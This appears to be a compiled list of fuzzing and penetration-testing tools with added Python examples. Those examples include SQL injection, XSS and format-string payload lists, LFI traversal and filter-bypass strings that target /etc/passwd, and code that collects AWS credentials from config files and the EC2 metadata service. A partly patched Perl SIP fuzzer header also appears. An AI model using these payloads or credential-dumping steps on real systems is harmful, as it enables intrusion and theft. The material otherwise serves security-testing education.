Fuzzing

Radamsa

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and easy to get up and running.

Requirements
Supported operating systems:
GNU/Linux
OpenBSD
FreeBSD
Mac OS X
Windows (using Cygwin)

Software requirements for building from sources:
gcc / clang
make
git
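The approach described above (read valid samples, emit "interestingly different" variants, see what the target does with them), as an added example in Python that is not Radamsa's own code. The sample format, the toy parser it is fed to, and the mutator set are constructed for illustration; the point is that every test case is reproducible from its seed and that clean rejections are separated from real robustness failures.

```python
import random
import struct

# Constructed sample of a toy length-prefixed record format (not from the page):
# magic "HDR\0", then repeated <u32 little-endian length><bytes>.
SAMPLE = b"HDR\x00" + struct.pack("<I", 5) + b"hello" + struct.pack("<I", 3) + b"abc"

# Integers a length or count field is likely to mishandle.
BOUNDARY_INTS = [0, 1, 0x7F, 0x80, 0xFF, 0x7FFF, 0xFFFF, 0x7FFFFFFF, 0xFFFFFFFF]


def bit_flip(data, rng):
    if not data:
        return data
    i = rng.randrange(len(data))
    return data[:i] + bytes([data[i] ^ (1 << rng.randrange(8))]) + data[i + 1:]


def insert_junk(data, rng):
    i = rng.randrange(len(data) + 1)
    junk = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    return data[:i] + junk + data[i:]


def delete_range(data, rng):
    if len(data) < 2:
        return data
    i = rng.randrange(len(data))
    return data[:i] + data[i + rng.randrange(1, 8):]


def repeat_chunk(data, rng):
    if not data:
        return data
    i = rng.randrange(len(data))
    j = min(len(data), i + rng.randrange(1, 16))
    return data[:j] + data[i:j] * rng.randrange(2, 6) + data[j:]


def boundary_int(data, rng):
    # Overwrite four bytes anywhere with a boundary value, hoping to hit a length field.
    if len(data) < 4:
        return data
    i = rng.randrange(len(data) - 3)
    return data[:i] + struct.pack("<I", rng.choice(BOUNDARY_INTS)) + data[i + 4:]


MUTATORS = [bit_flip, insert_junk, delete_range, repeat_chunk, boundary_int]


def mutate(sample, seed, rounds=3):
    """Apply a seeded chain of mutators, so every test case is reproducible from its seed."""
    rng = random.Random(seed)
    data = sample
    for _ in range(rounds):
        data = rng.choice(MUTATORS)(data, rng)
    return data


def parse_records(blob):
    """Toy target: returns the record payloads; raises ValueError on bad magic.
    Any other exception is an unexpected failure the fuzzer should report."""
    if blob[:4] != b"HDR\x00":
        raise ValueError("bad magic")
    pos, records = 4, []
    while pos < len(blob):
        (n,) = struct.unpack_from("<I", blob, pos)  # struct.error if the header is truncated
        pos += 4
        records.append(blob[pos:pos + n])
        pos += n
    return records


def run_case(target, case, expected=(ValueError,)):
    """None when the target accepts or cleanly rejects the input; otherwise the
    qualified name of the unexpected exception, i.e. a robustness bug."""
    try:
        target(case)
    except expected:
        return None
    except Exception as exc:
        return f"{type(exc).__module__}.{type(exc).__name__}"
    return None


def fuzz_campaign(target, sample, count, base_seed=0):
    """Returns (seed, failure, test_case) triples; mutate(sample, seed) reproduces the case."""
    findings = []
    for i in range(count):
        seed = base_seed * 1_000_000 + i
        case = mutate(sample, seed)
        failure = run_case(target, case)
        if failure:
            findings.append((seed, failure, case))
    return findings


if __name__ == "__main__":
    for seed, failure, case in fuzz_campaign(parse_records, SAMPLE, 500):
        print(seed, failure, case.hex())
```

Against a real target the harness would write each case to a file and run the program under a crash detector (exit signal, sanitizer output) instead of catching Python exceptions; the seed-to-case mapping is what makes a finding reproducible once the campaign has moved on.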

SDL MiniFuzz File Fuzzer

SDL MiniFuzz File Fuzzer is a basic file fuzzing tool designed to ease adoption of fuzz testing by non-security developers who are unfamiliar with file fuzzing tools or have never used them in their current software development processes.

System Requirements
Supported Operating System
Windows 7, Windows Vista, Windows XP
• For Visual Studio integration features: Visual Studio 2008
• For Team Foundation Server integration features: Microsoft Team Foundation Server 2008
• For Visual Studio Team System integration features: Microsoft Visual Studio Team System 2008

WebSeekurity

INTRODUCTION

WebSeekurity is a multi-platform tool that can be used to assess the security of Web applications that interact with a server via AMF/SOAP over HTTP. In particular, Adobe Flex applications can be audited with this software.

The tool acts as a client that communicates with the backend server under test. It sends requests to this server and receives the corresponding responses. WebSeekurity attempts to discover and identify potential server-side vulnerabilities: weak authentication and authorization mechanisms, information leakage, SQL injection, etc.

Several modes are proposed: Manual, Automatic and Fuzzing. The Manual mode lets you create a request from scratch. The Automatic mode discovers the services and methods exposed by the application in an automated manner. Finally, fuzzing is performed with the last mode.

WebSeekurity is released under the GNU GPLv2 license.

REQUIREMENTS:
Python 2.7 (not compatible with Python 3.0 or greater)
PyAMF
SOAPpy
pyparsing
Tcl-Tk
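What the Fuzzing mode does against a SOAP method, as an added example (not WebSeekurity's own code, which is Python 2 and built on PyAMF and SOAPpy): build one request per parameter and payload, leaving the other parameters at their valid values, then triage the responses for the error strings and size anomalies that hint at injection or information leakage. The service namespace, method, parameters, payload lists and error signatures are assumptions for illustration; an AMF target would need an AMF serializer in place of the SOAP envelope builder.

```python
import re
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"

# Hypothetical service, method and parameters (constructed for this example).
TARGET_NS = "http://example.test/UserService"
METHOD = "getUser"
PARAMS = {"username": "alice", "id": "42"}

# Payload families; each probes a different server-side weakness.
PAYLOADS = {
    "sqli": ["'", "\" OR 1=1--", "1; SELECT SLEEP(5)--"],
    "format": ["%s%s%s%s%n", "%x" * 16],
    "overflow": ["A" * 4096],
    "xss": ["<script>alert(1)</script>"],
}

# Response signatures worth a human look (assumed list, extend per target stack).
ERROR_SIGNATURES = [
    (re.compile(r"you have an error in your sql syntax", re.I), "mysql error"),
    (re.compile(r"unclosed quotation mark", re.I), "mssql error"),
    (re.compile(r"ORA-\d{5}"), "oracle error"),
    (re.compile(r"syntax error at or near", re.I), "postgres error"),
    (re.compile(r"\bat [\w.$]+\(\w+\.java:\d+\)"), "java stack trace"),
    (re.compile(r"<faultcode>"), "soap fault"),
]


def build_envelope(ns, method, params):
    """Serialize a SOAP 1.1 request; ElementTree escapes <, > and & in payload text."""
    ET.register_namespace("soapenv", SOAP_ENV)
    env = ET.Element(f"{{{SOAP_ENV}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_ENV}}}Body")
    call = ET.SubElement(body, f"{{{ns}}}{method}")
    for name, value in params.items():
        ET.SubElement(call, name).text = value
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def fuzz_cases(ns, method, params, payloads=PAYLOADS):
    """Yield (category, parameter, payload, request_bytes), one parameter mutated at a time."""
    for target in params:
        for category, values in payloads.items():
            for value in values:
                mutated = dict(params, **{target: value})
                yield category, target, value, build_envelope(ns, method, mutated)


def triage(status, body, baseline_len, payload=None):
    """Labels for a response: HTTP 5xx, known error strings, reflected payload,
    or a body size far from the valid-request baseline."""
    findings = []
    if status >= 500:
        findings.append("server error")
    for pattern, label in ERROR_SIGNATURES:
        if pattern.search(body):
            findings.append(label)
    if payload and payload in body:
        findings.append("payload reflected")
    if abs(len(body) - baseline_len) > max(256, baseline_len // 2):
        findings.append("response size anomaly")
    return findings


if __name__ == "__main__":
    for category, name, value, request in fuzz_cases(TARGET_NS, METHOD, PARAMS):
        print(category, name, len(request), request[:80])
```

The requests are meant to be POSTed with the target's SOAPAction header and compared against one baseline response recorded with the valid parameter values; the size heuristic in triage is only meaningful relative to that baseline. Time-based payloads (the SLEEP variant) need the response time recorded as well, which the triage above does not do.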

lfi-fuzzploit-tool

LFI_Fuzzploit is a simple tool to help in fuzzing for, finding, and exploiting local file inclusions in Linux-based PHP applications. Using special encoding and fuzzing techniques, lfi_fuzzploit scans for some known and some less known LFI filter bypasses and exploits, applying advanced encoding/bypass methods to get past input filters and reach its ultimate goal: exploiting a Local File Inclusion. In addition to its fuzzing and encoding techniques, LFI_fuzzploit has built-in methods for LFI exploitation, including the /proc/self/environ shell exploit, the file descriptor shell and the LFI shell via log injection. LFI_fuzzploit injects code using different command execution functions, in case certain functions are disabled. Coded by nullbyt3.
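The encoding/bypass side of the description, as an added example that is not LFI_fuzzploit's code: generate the common encodings of one traversal payload (each aimed at a different kind of input filter) and detect whether a response contains the target file, either verbatim or base64-encoded as php://filter returns it. The target file, parameter name and response bodies are constructed for illustration; the shell-exploitation features the page lists are not shown.

```python
import base64
import re
from urllib.parse import quote

# Constructed target file and hypothetical vulnerable parameter (not from the page).
TARGET_FILE = "/etc/passwd"
PARAM = "page"


def traversal(depth, target=TARGET_FILE):
    """'../' repeated `depth` times followed by the target path."""
    return "../" * depth + target.lstrip("/")


def encode_variants(path):
    """Encodings of one traversal payload, each aimed at a different filter."""
    return {
        "plain": path,
        "url": quote(path, safe=""),                          # ..%2F..%2F
        "double_url": quote(quote(path, safe=""), safe=""),   # ..%252F for decode-twice pipelines
        "dot_encoded": path.replace(".", "%2e"),
        "slash_encoded": path.replace("/", "%2f"),
        "nested_dotdot": path.replace("../", "....//"),       # survives one non-recursive strip of '../'
        "null_byte": path + "%00",                            # truncates an appended '.php' on PHP < 5.3.4
        "php_filter_b64": "php://filter/convert.base64-encode/resource=" + path,  # source as base64, not executed
    }


def probe_urls(base_url, param, depth=6):
    """One URL per variant; the values are deliberately not re-encoded."""
    return {name: f"{base_url}?{param}={value}"
            for name, value in encode_variants(traversal(depth)).items()}


PASSWD_RE = re.compile(r"\broot:[^:]*:0:0:")


def leaked_passwd(body):
    """'plain' if the body contains /etc/passwd, 'base64' if it contains it
    base64-encoded (php://filter output), otherwise None."""
    if PASSWD_RE.search(body):
        return "plain"
    for blob in re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", body):
        try:
            decoded = base64.b64decode(blob).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            continue
        if PASSWD_RE.search(decoded):
            return "base64"
    return None


def triage(responses):
    """Map variant name -> leak type for every response that leaked the file."""
    result = {}
    for name, body in responses.items():
        leak = leaked_passwd(body)
        if leak:
            result[name] = leak
    return result


# Constructed responses standing in for a real server (not captured anywhere).
PASSWD_SAMPLE = ("root:x:0:0:root:/root:/bin/bash\n"
                 "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
SAMPLE_RESPONSES = {
    "plain": "<html><body>Warning: include(): failed to open stream</body></html>",
    "nested_dotdot": "<html><body><pre>" + PASSWD_SAMPLE + "</pre></body></html>",
    "php_filter_b64": "<html><body>" + base64.b64encode(PASSWD_SAMPLE.encode()).decode() + "</body></html>",
}

if __name__ == "__main__":
    for name, url in probe_urls("http://example.test/index.php", PARAM).items():
        print(name, url)
    print(triage(SAMPLE_RESPONSES))
```

In the constructed responses the plain variant was filtered while the nested '../' form and the php://filter wrapper got through, which is the pattern the tool's encoding sweep is meant to surface: the detector matters as much as the payload list, because a base64 blob in an HTML page is easy to overlook when grepping for "root:".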

Grendel-Scan

A tool for automated security scanning of web applications. Many features are also present for manual penetration testing.

Penetration Testers Framework

Overview:
The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustomed to the /pentest/ directories or our own toolsets that we want to keep up to date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is consistent with the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minutes.

SIP Army Knife

SIP Army Knife is a fuzzer that searches for cross site scripting, SQL injection, log injection, format strings, buffer overflows, and more.

#!/usr/bin/perl
#SIP VoIP Protocol Fuzzer
#Created: Blake Cornell

use strict;
#use warnings; LOTS OF WARNINGS ____ SOLVE THIS AND INCREASE EFFICIENCY

use IO::Select;
use IO::Socket;
use IO::Socket::INET;
use Getopt::Long;
use Pod::Usage;
use Time::HiRes qw( alarm );
use Digest::MD4 qw( md4_hex );
use Digest::MD5 qw( md5_hex );
use Digest::CRC qw( crc32 crc16 );
use HTML::Entities;

my @timeoutDetection = ();
my @md5Requests = ();
my @md4Requests = ();
my @crc32Requests = ();
my @crc16Requests = ();
my $packetCount = 0; # default assumed; the value was lost in extraction
my $socketType='';
my $result = GetOptions('host|h=s' => \(my $host = ''),
      'dport|p=s' => \(my $dport = ''),
      'sport|s=s' => \(my $sport = ''), # short alias changed from 'p', which collided with dport
      'verbose|v' => \(my $verbose),
      'veryverbose|vv' => \(my $veryVerbose),
      'connection|c' => \(my $connection), #to listen to response or not
      'density|d=s' => \(my $density = 1), #determines how many mutations to use (default assumed; lost in extraction)
      'timeout|t=s' => \(my $timeout = .1),
      'count' => \(my $countTests = 0), #counts the number of packets to test (default assumed; lost in extraction)
      'md4' => \(my $md4), #can cause timeouts
      'md5' => \(my $md5), #can cause timeouts
      'crc32' => \(my $crc32), #can cause timeouts
      'crc16' => \(my $crc16), #can cause timeouts
      'start=s' => \(my $startPosition), #if set, then start at this position
      'stringFormats' => \(my $stringFormats),
      'stringOverflows' => \(my $stringOverflows),
      'integerFormats' => \(my $integerFormats),
      'injectHeaders' => \(my $injectHeaders),
      'xss' => \(my $xss),
      'sqli' => \(my $sqli),
      'callId' => \(my $callId), #call id is incremented
      'detectVersion' => \(my $detectVersion),
      'getOptions' => \(my $getOptions),
      'help' => \(my $help),
      'proto=s' => \(my $proto),
) or pod2usage(2); # GetOptions returns false on a bad option; the call was left unclosed on this page
pod2usage(1) if $help;

Nimbostratus

Tools for fingerprinting and exploiting Amazon cloud infrastructures. These tools are a PoC which I developed for my "Pivoting in Amazon clouds" talk, built using the great boto library for accessing Amazon's API.

The nimbostratus toolset is usually used together with nimbostratus-target, which helps you set up a legal environment where this tool can be tested.

Installation
git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt

Usage
Providing AWS credentials
Some nimbostratus sub-commands require you to provide AWS credentials. They are provided using the following command line arguments:
--access-key
--secret-key
--token , which is only used when the credentials were extracted from the instance profile.

Dump credentials
Identifies the credentials available on this host and prints them to the console. This is usually the first command to run after gaining access to an EC2 instance.
$ nimbostratus dump-credentials
Found credentials
Access key: ...
Secret key: ...

Once you've got the credentials from an EC2 instance you've exploited, you can continue to work from any other host with internet access (remember: EC2 instances are in many cases spawned for a specific task and then terminated).

IMPORTANT: This will extract information from boto's credential configuration sources and from the instance meta-data. If the system uses other libraries to connect to AWS the credentials won't be dumped.
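Where dump-credentials looks, as an added example that is not nimbostratus's code: the environment variables and INI-style files that boto and the AWS CLI read, plus the instance profile document served by the EC2 metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>. The environment, file contents and metadata JSON below are constructed (the static key pair is the placeholder pair from the AWS documentation; the temporary credentials are made up), and the HTTP fetch of the metadata document is left to the caller so the code runs offline.

```python
import configparser
import json

# Constructed inputs (not captured from any real host).
SAMPLE_ENV = {
    "AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",
    "AWS_SECRET_ACCESS_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
}
SAMPLE_FILES = {
    # boto (2.x) config: ~/.boto or /etc/boto.cfg
    "/home/app/.boto": (
        "[Credentials]\n"
        "aws_access_key_id = AKIABOTOEXAMPLE00001\n"
        "aws_secret_access_key = boto%secret%with%percent%signs\n"
    ),
    # AWS CLI / boto3 shared credentials file, one section per profile
    "/home/app/.aws/credentials": (
        "[default]\n"
        "aws_access_key_id = AKIACLIEXAMPLE000001\n"
        "aws_secret_access_key = cli/secret/1\n"
        "\n"
        "[ci]\n"
        "aws_access_key_id = AKIACLIEXAMPLE000002\n"
        "aws_secret_access_key = cli/secret/2\n"
        "aws_session_token = FwoGZXIvYXdzEXAMPLE\n"
    ),
}
# Body of .../iam/security-credentials/<role>; the field names are the real ones.
SAMPLE_METADATA = json.dumps({
    "Code": "Success",
    "LastUpdated": "2024-01-01T00:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLETEMPKEY01",
    "SecretAccessKey": "temp/secret/from/instance/profile",
    "Token": "IQoJb3JpZ2luX2VjEXAMPLE",
    "Expiration": "2024-01-01T06:00:00Z",
})


def creds_from_env(env):
    """Environment variables honoured by boto 2 and by boto3 / the AWS CLI."""
    ak = env.get("AWS_ACCESS_KEY_ID")
    sk = env.get("AWS_SECRET_ACCESS_KEY")
    if not (ak and sk):
        return []
    token = env.get("AWS_SESSION_TOKEN") or env.get("AWS_SECURITY_TOKEN")
    return [("environment", ak, sk, token)]


def creds_from_ini(text, source):
    """Credentials from any INI section that carries a key pair.
    interpolation=None matters: secret keys may legitimately contain '%'."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    found = []
    for section in cp.sections():
        ak = cp.get(section, "aws_access_key_id", fallback=None)
        sk = cp.get(section, "aws_secret_access_key", fallback=None)
        if ak and sk:
            token = (cp.get(section, "aws_session_token", fallback=None)
                     or cp.get(section, "aws_security_token", fallback=None))
            found.append((f"{source}:{section}", ak, sk, token))
    return found


def creds_from_metadata(role_doc):
    """Parse the instance profile document; these are temporary credentials,
    so the Token must accompany the key pair on every later API call."""
    doc = json.loads(role_doc)
    if doc.get("Code") != "Success":
        return []
    return [("instance profile", doc["AccessKeyId"], doc["SecretAccessKey"], doc.get("Token"))]


def dump_credentials(env, config_files, metadata_doc=None):
    """Return (source, access_key, secret_key, token) for every credential found."""
    found = creds_from_env(env)
    for path, text in config_files.items():
        found += creds_from_ini(text, path)
    if metadata_doc:
        found += creds_from_metadata(metadata_doc)
    return found


if __name__ == "__main__":
    for source, ak, sk, token in dump_credentials(SAMPLE_ENV, SAMPLE_FILES, SAMPLE_METADATA):
        print(f"{source}: {ak} {'(with session token)' if token else ''}")
```

Two caveats for real hosts: on instances that enforce IMDSv2 the metadata document can only be fetched with a session token obtained from a PUT to /latest/api/token (with the X-aws-ec2-metadata-token-ttl-seconds header), and credentials from the instance profile are the case the --token argument above exists for, since the key pair alone is rejected without it.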

Dump permissions
This tool will dump all permissions for the provided credentials. This tool is commonly used right after dump-credentials to know which permissions are available for you.
$ nimbostratus dump-permissions --access-key=... --secret-key=...
Starting dump-permissions
These credentials belong to low_privileged_user, not to the root account
Getting access keys for user low_privileged_user
User for key AKIAIV...J6KVA is low_privileged_user

LFI ExplOiter

LFI ExplOiter is an open source penetration testing tool that automates the process of detecting and exploiting Local File Inclusion.

Zed Attack Proxy (ZAP)

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
